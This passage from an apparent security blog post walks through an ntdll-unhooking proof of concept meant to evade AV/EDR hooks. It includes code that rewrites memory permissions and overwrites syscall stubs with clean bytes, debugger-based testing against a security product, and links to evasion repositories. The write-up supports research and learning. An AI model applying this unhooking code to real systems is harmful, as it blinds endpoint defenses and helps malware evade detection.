DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
- The ChangePerms() function works as follows:
DWORD ChangePerms(PVOID textBase, DWORD flProtect, SIZE_T size)
{
DWORD oldprotect;
VirtualProtect(textBase, size, flProtect, &oldprotect);
return oldprotect;
}
- After changing the permissions of the memory region for writing, we use memcpy to write 23 bytes to that memory region.
- The size of the complete syscall stub is 23 bytes
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
- Once we have overwritten the stub with the clean bytes, we can change the permissions back to the original
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
Tying up loose ends
- Once our purpose of unhooking the ntdll is completed, we can finally terminate the suspended process using the TerminateProcess API
TerminateProcess(hProcess, 0);
Testing the POC
Now that we have understood how the POC works, we can test it against any AV/EDR. The POC does not contain any injection code that could lead to code execution. Leaving it out keeps the focus on the technique itself and makes the code easier to follow. Also, it takes a lot more work to get an agent callback against the EDR that I was testing my code against. This POC just focuses on the unhooking aspect of the technique.
- In order to test the POC, we need our program to wait for user input before unhooking. During this time, we can attach a debugger to it
- Here we can see that our program is waiting for user input. Now attach x64Dbg to it
- We can see both the suspended process and the parent process
- We attach the debugger to the parent process
- Search for the NtCreateThread API in the ntdll.dll module
- We pick this function because most AV/EDRs don’t hook each and every function, in order to reduce the amount of computation needed as well as to reduce false positives.
- Checking the function, we see that there is a jmp instruction at the start of this function, instead of the syscall stub. However, this is not the case with the next function.
- This is because NtCreateThread is widely used by malware.
- Now we continue with the execution of our program by pressing enter
- We see that it has successfully executed
- Now let's check on the NtCreateThread API
- We see that there is now a normal syscall stub instead of the jmp instruction that we had seen previously.
- This shows that we have successfully unhooked the ntdll.dll of the current process using a novel technique
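The before and after comparison made in the debugger comes down to looking at the first few bytes of the function. As a rough sketch of that check in code, the example below classifies a prologue as a clean stub or as one of two common jmp encodings. Prologue, ClassifyPrologue and the demo arrays are hypothetical names for this illustration, and it assumes the hook is a jmp placed at the very start of the function, as seen in the test above; other hooking styles would not be recognised by it.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

enum class Prologue { CleanStub, JmpRel32, JmpIndirect, Unknown };

// Classify the first bytes of a function.
// 4C 8B D1 B8 : mov r10, rcx ; mov eax, imm32 (start of an unhooked stub)
// E9          : jmp rel32
// FF 25       : jmp qword ptr [rip+disp32]
Prologue ClassifyPrologue(const std::uint8_t* p, std::size_t len) {
    assert(p != nullptr);
    if (len >= 4 && p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 && p[3] == 0xB8)
        return Prologue::CleanStub;
    if (len >= 1 && p[0] == 0xE9)
        return Prologue::JmpRel32;
    if (len >= 2 && p[0] == 0xFF && p[1] == 0x25)
        return Prologue::JmpIndirect;
    return Prologue::Unknown;
}

// Demo data only: hand-written byte sequences, not dumps from a real module.
constexpr std::uint8_t kDemoClean[]    = {0x4C, 0x8B, 0xD1, 0xB8, 0x4E, 0x00, 0x00, 0x00};
constexpr std::uint8_t kDemoJmp[]      = {0xE9, 0x78, 0x56, 0x34, 0x12, 0xCC, 0xCC, 0xCC};
constexpr std::uint8_t kDemoIndirect[] = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00, 0xCC, 0xCC};
```

Running such a check on the same function before and after the overwrite would give the same answer as the manual inspection in x64Dbg.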
Conclusion
This technique is indeed a very interesting and fun way to unhook ntdll. It relies on the basic fact that when a process is created, at first only ntdll.dll is loaded and the other modules follow later, and it takes advantage of that very well.
However, while writing this code and adding my own changes to it, I felt that the technique was becoming unnecessarily complex. There may be ways to make it simpler and better, but it all comes down to the fact that there are still many better evasion techniques than this. Also, to overwrite the hooked ntdll you need to change the permissions of the memory region to PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which can be easily flagged by most AV/EDR software.
While working on this POC, I learned a lot about how modules are loaded in processes and how you can navigate through the Export Table. That’s what makes it a great learning experience for me, and I’d love to take the courses offered by Sektor7. Even with a simple blog post, they have inspired me to hop into the rabbit hole and emerge as a more knowledgeable hacker.
All credit for the original concept and theory goes to Sektor7.
My POC code at : https://github.com/dosxuz/PerunsFart
References
- https://blog.sektor7.net/#!res/2021/perunsfart.md
- https://github.com/plackyhacker/Peruns-Fart
- https://github.com/am0nsec/HellsGate/blob/master/HellsGate/main.c
- https://github.com/paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h
- https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time